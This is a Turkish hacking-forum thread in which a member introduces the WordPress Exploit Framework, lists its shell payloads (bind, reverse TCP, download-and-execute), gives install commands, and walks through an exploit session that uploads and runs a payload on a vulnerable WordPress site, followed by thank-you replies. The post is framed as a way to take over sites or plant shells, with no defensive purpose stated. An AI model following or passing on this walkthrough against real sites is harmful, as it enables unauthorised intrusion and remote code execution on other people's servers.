İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

Wordpress Exploit Framework //GHOSTCLOUD

GHOST CLOUD - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2015
Nereden:
ÖTÜKEN
Mesajlar:
2.536
Konular:
265
Teşekkür (Etti):
285
Teşekkür (Aldı):
555
Ticaret:
(0) %
24-10-2018 00:12
#1
Post
Wordpress Exploit Framework //GHOSTCLOUD
Wordpress Exploit Framework





Wordpress sitelerde bulunan birçok exploit zaafiyetini Wordpress Exploit Framework kullanarak ele geçirebilir veya shell yükleyebilirsiniz.
İçerisinde 288 Exploit, 58 Auxilaries, 7 Payload bulunmaktadır.


Exploit ve Auxiliary Modülleri Arasındaki Farklar

Auxiliary modülleri, hedef makineden bilgi almanıza, ayrıcalıkları yükseltmenize veya hizmet işlevselliklerini reddetmenize olanak tanır. Tüm bunları yaparken karşı makinede yük çalıştırmaz.

Exploit modülleri, exploit cihaza atıldıktan sonra çalıştırılan, makineden bilgi toplamak, uzaktan shell veya web sunucusuna bağlanmak için rastgele kod çalıştırmanıza olanak sağlayan paketler bulunduran bir derlemedir.


Yüklü Payloadlar

bind_php: Belirli bir bağlantı noktasına bağlanacak ve WPXF'nin shell oluşturmasına izin verecek bir komut dosyası yükler.

custom: Özel bir PHP betiğini yükler ve çalıştırır.

download_exec: İndirilebilen ve uzaktan çalıştırılabilen bir dosyayı çalıştırır.

exec: Uzak sunucuda bir shell komutu çalıştırır ve çıktıyı WPXF oturumuna döndürür.

reverse_tcp: Ters TCP shell' oluşturacak bir komut dosyası


Ön Kurulum

Eğer bundler sisteminizde yüklü değilse yükleyiniz.

Kod:
gem install bundler

C uzantılarını derlemek için gerekli tüm araçlara sahip olduğunuzdan emin olun.

Kod:
sudo apt-get install build-essential patch

Ayrıca, geliştirme dosyalarının sisteminizde yüklü olduğundan emin olun.

Kod:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev

Kurulum

Öncelikle kurulum için Masaüstüne geliyoruz.(Rahatça erişebilmek için masaüstüne yüklüyorum, isteyenler ana dizine yükleyebilirler.)

Kod:
cd Desktop


Daha sonra github'dan frameworkümüzü indirmek için aşağıdaki kodu giriyoruz.

Kod:
git clone https://github.com/rastating/wordpress-exploit-framework.git


Masaüstüne indirdiğimiz klasörümüze giriyoruz.

Kod:
cd wordpress-exploit-framework


Framework kurulumunu çalıştırıyoruz.(Sistemde yönetici olduğunuzdan emin olun.)

Kod:
bash rebuild_and_install_gem.sh


Framework'ümüzü açıyoruz.

Kod:
ruby wpxf.rb


Ve bizi exploit framework'ümüzün girişi karşılıyor.



Örnek Kullanım

Kod:
wpxf > use exploit/shell/symposium_shell_upload

[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>

wpxf [exploit/symposium_shell_upload] > set host wordpresssite     //wordpress açıklı site

[+] Set host => wordpresssite

wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/ //Açığın bulunduğu satır

[+] Set target_uri => /wordpress/

wpxf [exploit/symposium_shell_upload] > set payload exec    //Exploit için seçtiğimiz payload

[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>

wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"   //Yüklenen shellde vermek istediğimiz mesaj

[+] Set cmd => echo "Hello, world!"

wpxf [exploit/symposium_shell_upload] > run    //Çalıştırma komutu

[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully

Bunun gibi birçok exploit ve auxiliary mevcuttur. Bulmak için:

Kod:
show payloads
Kod:
show exploits
Kod:
show auxiliaries
---------------------
Hiçbir şeye ihtiyacımız yok, yaInız bir şeye ihtiyacımız vardır; çaIışkan oImak!
_____________________________________________

TÜRK
Konu GHOST CLOUD tarafından (24-10-2018 18:10 Saat 18:10 ) değiştirilmiştir.
ch_arli41, 'TÜRKÇÜ, RedLinee Teşekkür etti.
ch_arli41 - ait Kullanıcı Resmi (Avatar)
Eğitmen
Üyelik tarihi:
07/2009
Mesajlar:
983
Konular:
61
Teşekkür (Etti):
613
Teşekkür (Aldı):
482
Ticaret:
(0) %
24-10-2018 00:31
#2
Eline sağlık güzel konu olmuş.
---------------------
GHOST CLOUD Teşekkür etti.
oldnco - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2017
Yaş:
29
Mesajlar:
1.520
Konular:
43
Teşekkür (Etti):
636
Teşekkür (Aldı):
372
Ticaret:
(0) %
24-10-2018 00:50
#3
Emeğine sağlık. Güzel konu olmuş.
GHOST CLOUD Teşekkür etti.
TuranAlemdar - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2017
Yaş:
27
Mesajlar:
1.147
Konular:
194
Teşekkür (Etti):
1552
Teşekkür (Aldı):
338
Ticaret:
(0) %
24-10-2018 12:36
#4
Ellerinize Sağlık Komutan
---------------------





]Dikkatli Geçirilen Vakit Nakittir...!
Kader Zamanı Takip Eder...! Zaman İşe Kaderi
Kaderin Çizdiği Yol Başarısız Olsa Bile Başarmak..!
Mimar Sınan Gibi İş Yap Kanuni Sultan Süleyman Han Gibi Büyü..!
Cesaret insanı zafere , kararsızlık tehlikeye , korkaklık ise ölüme götürür.





GHOST CLOUD Teşekkür etti.
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
2.941
Konular:
86
Teşekkür (Etti):
201
Teşekkür (Aldı):
925
Ticaret:
(0) %
24-10-2018 12:43
#5
Eline Sağlık Güzel Konu
GHOST CLOUD Teşekkür etti.
RedLinee - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2014
Nereden:
.php | .js
Mesajlar:
209
Konular:
24
Teşekkür (Etti):
128
Teşekkür (Aldı):
48
Ticaret:
(0) %
24-10-2018 13:52
#6
Muhteşemsiniz. Eline gözüne emeğine sağlık 😋
---------------------
"Uyuyan milletler ya ölür,
Ya da köle olarak uyanır!"
GHOST CLOUD Teşekkür etti.
RooTGHoST - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2018
Nereden:
38
Mesajlar:
1.446
Konular:
38
Teşekkür (Etti):
446
Teşekkür (Aldı):
265
Ticaret:
(0) %
24-10-2018 14:04
#7
Emeğinize Sağlık Hocam..
GHOST CLOUD Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı